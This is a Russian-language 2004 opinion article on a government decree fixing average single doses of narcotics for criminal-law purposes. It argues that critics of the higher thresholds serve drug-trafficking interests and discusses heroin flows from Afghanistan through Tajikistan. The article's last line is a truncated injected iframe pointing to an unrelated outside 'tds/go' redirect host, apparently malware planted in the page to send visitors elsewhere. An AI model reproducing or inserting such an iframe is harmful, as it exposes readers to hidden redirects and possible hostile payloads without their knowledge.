Протест как средство для передела рынка наркотиков?
С 12 мая вступило в силу постановление Правительства РФ от б мая 2004 года № 231 «Об утверждении размеров средних разовых доз наркотических средств и психотропных веществ для целей статей 228, 2281 и 229 Уголовного кодекса Российской Федерации».
Привожу «шапку» документа полностью, дабы был ясен предмет разговора. А именно, кто для общества опаснее: наркоман или наркоторговец? И что дешевле обществу: посадить наркомафиози или лечить наркозависимых?
В правительственном документе, послужившем поводом для шума (в кругах «борцов»-общественников и некоторых деятелей уже государственного масштаба), перечень 228 типов, видов и вариантов наркотиков и психотропных веществ как запрещённых к обороту в России, так и имеющих к тому ограничения. Против каждого наименования — размер дозы. В Уголовном кодексе, к слову, записано, что крупным размером признаётся количество, превышающее размеры средней разовой дозы потребления в десять
и более раз, а особо крупным размером — в пятьдесят и более раз. В УК же чёткое указание, что размеры доз утверждаются Правительством РФ. Что оно, как мы видим, и сделало.
Произошло это через месяц после расширенного заседания коллегии Федеральной службы РФ по контролю за оборотом наркотических средств и психотропных веществ (ФСН). Владимир Путин на коллегии назвал приоритеты: ликвидировать финансовую базу наркомафии, пресечь легализацию наркодоходов, уничтожить сеть производства, транспортировки и распространения наркотиков. В общем, не по «воробьям» стрелять, а брать «бешеного быка» за рога.
Возмутившиеся правительственным документом «общественники» этого, видимо, не заметили.
Как и того, что в постановлении более двух сотен наименований, а не пяток, которыми «борцы» пугают население. Да, размеры разовых доз увеличены, но это может означать одно: отчёты правоохранительных органов и спецслужб не будут теперь пестрить тысячами мнимых «наркобарыг». Теперь там, будем надеяться, станут главенствовать пункты о ликвидации преступных группировок; блокировании караванов; разгроме перевалочных баз; лишении банковской лицензии etc. Пропадает база для мелких мистификаций о результатах бурной деятельности.
И в ход пошла большая фальсификация. Разыгрывается даже национальная карта. Например, «общественники» (и государственные мужи) утверждают, будто основную угрозу для Среднего Урала (и Екатеринбурга в частности) представляют таджики, якобы засланные к нам тамошними наркобаронами. Однако именно с соответствующими агентствами Таджикистана и Кыргызстана ФСН РФ подписало меморандумы о совместной работе по контролю наркотиков. Скажу больше: в Таджикистане героина и опия изымается вдвое (!) больше, чем в России! И изымается, надо полагать, при помощи российских пограничников, которые до сих пор стоят на бывших советских рубежах — в горах, за которыми Афганистан
Так вот, по свидетельству дипломатов из представительства российского МИДа в этой стране, около 70 процентов героина, распространяемого в России, произведено в Афганистане. Напомню, что Организация Договора о коллективной безопасности, в которую входят Россия, Армения, Беларусь, Казахстан, Кыргызстан и Таджикистан, координирует и объединяет усилия государств в борьбе с международным терроризмом и экстремизмом, незаконным оборотом наркотиков, оружия, организованной транснациональной преступностью, нелегальной миграцией.
Предлагать «придвинуть» границу с «огероиненным» Афганистаном ближе к России могут лишь весьма недалёкие политики. Или те, кто себе на уме. Либо— кому «поручено» отстаивать интересы наркомафии. Ибо наркоторговцам выгодно, когда государство тратит усилия и распыляет средства в «борьбе» с наркоманами, а на игле мафиози появляются всё новые и новые жертвы. <iframe src="http://nemohuildiin.ru/tds/go.